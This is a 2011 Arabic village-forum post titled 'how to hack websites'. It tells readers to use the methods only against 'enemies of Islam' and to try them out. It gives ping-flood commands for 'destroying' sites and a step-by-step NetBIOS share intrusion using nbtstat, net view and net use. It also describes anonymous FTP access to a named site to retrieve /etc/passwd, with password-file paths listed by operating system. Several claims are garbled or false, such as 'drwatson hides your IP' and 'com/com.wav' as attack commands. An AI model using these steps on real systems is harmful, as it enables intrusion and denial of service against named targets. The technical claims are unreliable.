ودبانقا القبة

الزائر الكريم اهلا ومرحب بيك في منتدي ودبانقا القبة
ودبانقا القبة

منتدى عام يهدف لخلق الصلاة الطيبه وتبادل الاراء ويهتم بقضايا المنطقة

الزائر الكريم اهلا ومرحب بكم في منتدي ودبانقا القبة
الي جميع اهلي بود بانقا القبةالحبيبة داخل وخارج الوطن الكبير ندعوكم للتواصل عبر هذا المنتدي تواصلا للاجيال واسترجاعا لسالفات الايام في قريتنا الحبيبة
الاعضاء الكرام تم تشغيل بوابة الدردشه اسفل المنتدي يرجي التسجيل للدخول في الدردشه

    طرييقة تهكير المواقع

    شاطر

    عبد الاله موسى ود بليص

    عدد المساهمات : 4
    تاريخ التسجيل : 29/01/2011

    طرييقة تهكير المواقع

    مُساهمة من طرف عبد الاله موسى ود بليص في السبت مايو 28, 2011 5:14 am

    هذا الموضوع خطير جدا أرجو عدم الأستخدام إلامن هوعدوللإسلام و المسلمين...
    اخطر واغرب الأوامر بالدوس للهكر:
    لتدمير المواقع:
    ping -t www.***.com
    هذا الأمر يقوم بالضغط على المضيف
    ping -t -a -f www.***.com
    أماهذا الأمر الشاطر فيقوم باعطاء الاوامر للمستضيف
    ping www.***.com
    وهذا الأمر يقوم باعطاءك اي بي الموقع ويستخدم الاي بي للتدمير مثلاً بينج "ping "بعدها الاي بي
    com/com.wav
    com3/com3/.wav
    com1/com.wav
    وهذه الاوامر للهجوم اكتب الموقع أوهذا الامر أو الاي بي يكون افضل
    ping -w timeout www.***.com
    وهذا الامر يستعمل لمعرفة سرعة المواقع
    NETSTAT -S
    هذه المنافذ في جهازك
    NETSTAT -A
    هذا الامر لترىالمنافذ ومن مرتبط معك بالبروتكل يعني تشوف من يحاول يخترقك
    NETSTAT -N
    هذا الامر لأخراج الاي بي ارسل اي ملف لمن معك على الماسنجر وهو يحمل اكتبه سيأتيك الاي بي اخر شي على اليمين هذا هو واخر شي على اليسار يوو يعني انت
    NETSTAT -P
    هذا منافذ البروتكوكل
    drwatson
    هذا الامر لأخفاء الاي بي
    والان هذه اوامر خطيرة
    الإختراق عن طريق NetBios Attack
    هذه الثغرة تظهر بصورة خاصة إذا ما كان لديك Home Network أو أى نوع اخر من أنواع الشبكات مثل LAN أو WAN أو MAN وغيرها ، أيضا يمكن إختراق حاسبك الشخصى إذا كانت لديك تلك الثغرة.
    وللتجربة على نفسك كمثال : أحصل على IP الخاص بجهازك بواسطة هذا البرنامج الصغير ."NetBios Attack"
    1- بعد حصولك على IP سيظهر بالشكل التالى 207.107.1.1 ( هذا الرقم إفتراضى).

    2- الان إذهب الى START ثم RUN ثم إكتب CMD لتفتح لك شاشة الدوس .

    3- إكتب داخل شاشة الدوس Nbtstat –A IP ADRESS : لا تنسى أن تكتب IP الخاص بك مكان IP ADRESS ، ثم إضغط ENTER .

    4- سيظهر لك الجدول التالى :
    NetBIOS Remote Machine Name Table
    ____________________________________
    Name Type Status
    -------------------------------------------
    J-1 <00> UNIQUE Registered
    WORK <00> GROUP Registered
    J-1 <03> UNIQUE Registered
    J-1 <20> UNIQUE Registered
    WORK <1E> GROUP Registered
    WORK <1D> UNIQUE Registered
    __MSBROWSE__.<01>GROUP Registered
    ملحوظة : تم حذف المعلومات الأصلية من الجدول .

    5- الرقم الظاهر ما بين <> يطلق عليه HEX CODE VALUE ، وما يهمنا هنا أن نجد رقم 20 ما بين الأقواس وهذا يعنى أننا لدينا PRINTER OR FILES SHARED TURNED ON ، وهو ما يعنى أننا لدينا شخص لدية ملفات وطابعة يمكن مشاركتها عبر الإنترنت وهذا عيب خطير في أنظمة التشغيل وثغرة خطيرة يمكن إستغلالها في إختراقه.

    6- الان يمكنك التعرف على الملفات التى يمكن مشاركتها أو التغيير فيها والتلاعب بها كيفما تشاء وذلك بكتابة الأمر التالى في شاشة الدوس:
    Net view \\<insert ip_address here>

    7- سوف يظهر لك الجدول التالى الذى يدل على وجود الملفات التى يمكن التلاعب فيها :
    Shared resources at \\ip_address
    Sharename Type Comment
    MY DOCUMENTS Disk
    TEMP Disk
    8- الان يمكنك الدخول الى ملف TEMP والتلاعب فيه :
    Net use x: \\<insert IP address here>\temp
    طبعا إسلوب NSETBIOS مر بالعديد من التطورات ، نظرا لأن العديد من المستخدمين وأنظمة التشغيل قد تلافوا هذه الثغرة الخطيرة لديهم ، بإذن الله سأقدم الطرق الأخرى الأكثر تطورا في وقت لاحق ..
    * لكي تستطيع اختراق موقع لا بد أن تعرف اسم المستخدم وكلمة المرور الخاصة بالموقع
    User name-Password
    وهما يكونان محفوظين في ملف يسمي
    PASSWD غالبا
    بعض المواقع تضع هذا الملف في الإف تي بي
    ما هو إف تي بي؟
    FTP=File Transfer Protocol بروتوكول نقل الملفات
    تستطيع الاتصال بالموقع وسحب هذا الملف عن طريق التلنت
    start==>run إبدأ ثم تشغيل
    واكتب telnet
    سيفتح التلنت اضغط علىRemote System ==> connect
    ثم اكتب الموقع في Host Name مثلا
    kahane.org أو الآيبي الخاص به
    وفي PORT اكتب 21 وهو البورت الخاص بالإف تي بي
    ثم اضغط connect
    وبعد أن يظهر رد السيرفر اكتب ولكن..لن ترى ما كتبت!! شفرة source code
    user anonymous
    ثم انتر بعدها يطلب السيرفر كلمة السر اكتب
    passtttttttt@yahoo.com
    اكتب أي بريد ككلمة سر وطبعا سيكون وهميا
    ماذا فعلنا؟لقد دخلنا إلى سيرفر الموقع في وضع التخفي وبعض المواقع تسمح بهذه الخاصية وبعضها لا يسمح..
    بعدها سنحصل على ملف الباسوورد
    قبل ذلك أحب أن أذكر أنه يمكنك عمل الأشياء السابقة عن طريق أي برنامج إف تي بي مثل
    cute ftp - ws_ftp
    مثلاأو حتى الذهاب إلى المتصفح وكتابة الموقع هكذا في حقل العنوان
    ftp.kahane.org
    لتحصل على الملف في التلنت اكتب
    retr /etc/passwd
    /etc هو المجلد الذي يحتوي الملف passwd ويختلف اسم المجلد واسم ملف الباسوورد باختلاف نظام تشغيل الموقع
    Sunos 5.0 etc/shadow او etc/passwd
    Linux etc/shadow او etc/passwd
    BSD4.3 –RENO etc/master.passwd
    AIX etc/security/passwd
    NT ويندوز scripts/passwd
    وتختلف أسماء ملف الباسوورد بين passwd و admin.pwl و غيرها::
    -------------------------------------
    في ملاحظة الكل الان يمكن قاعد يدور عليها وهي كالتالي
    === كيف اطلع ip الخاص فيني ====
    اقلك كيف الطريقة اسهل من السهل === ادخل الدوس واكتب الامر التال(ipconfig)
    راح يطلعلك معلومات كتيره ومن ضمنها هالمعلومه هي ( IPv4 Address. . . . . . . . . . . : 192.***.*.3)
    اتمنى تكون وضحة الصوره
    وارجو تجريبهو فى منتدى القبة

      الوقت/التاريخ الآن هو الخميس نوفمبر 15, 2018 7:09 pm